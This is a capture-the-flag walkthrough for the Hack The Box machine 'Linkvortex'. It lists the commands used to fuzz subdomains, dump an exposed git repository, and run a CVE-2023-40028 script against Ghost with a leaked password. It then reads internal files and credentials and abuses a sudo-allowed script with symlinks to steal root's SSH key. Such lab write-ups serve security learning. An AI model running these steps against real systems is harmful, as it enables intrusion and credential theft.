LinkvortexMarch 02, 2025 Created by Page Difficulty OS 0xyassine Hack The Box Easy Linux I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.47 -oG scan nmap -p22,80 -sCV -Pn 10.10.11.47 -oN ports I go to the site and see that a de-tialized version of Ghost is running. I find that it has a vulnerability, CVE-2023-40028. I need to find a valid credential to be able to abuse this vulnerability. I do a search for subdomains and I find one. wfuzz -c -t 100 --hh=230 -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -H "Host: FUZZ.linkvortex.htb" http://linkvortex.htb When listing the found subdomain I find a git repository. I download it with git-dumper git-dumper "http://dev.linkvortex.htb/.git" /home/rufo/linkVortex/content/example I search in the repository files and find some passwords. I try with the passwords I found and the vulnerability I found before and I manage to find some valid credentials. ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45 I modify the script to point to the endpoint and I manage to read internal files of the machine. LFI I list the repository files and manage to find some credentials in the production environment configuration file Thanks to these credentials I am able to log in via ssh and read the first flag  Listing the system files, I see that I can execute as root the file clean_symlink.sh and passing any file as argument. I create a couple of symbolic links to be able to read the file with the ssh key of the root user. ln -s /root/.ssh/id_rsa link1.txt ln -s /tmp/a/link1.txt duo.png sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /tmp/a/duo.png With this key I connect via ssh as root and manage to read the second flag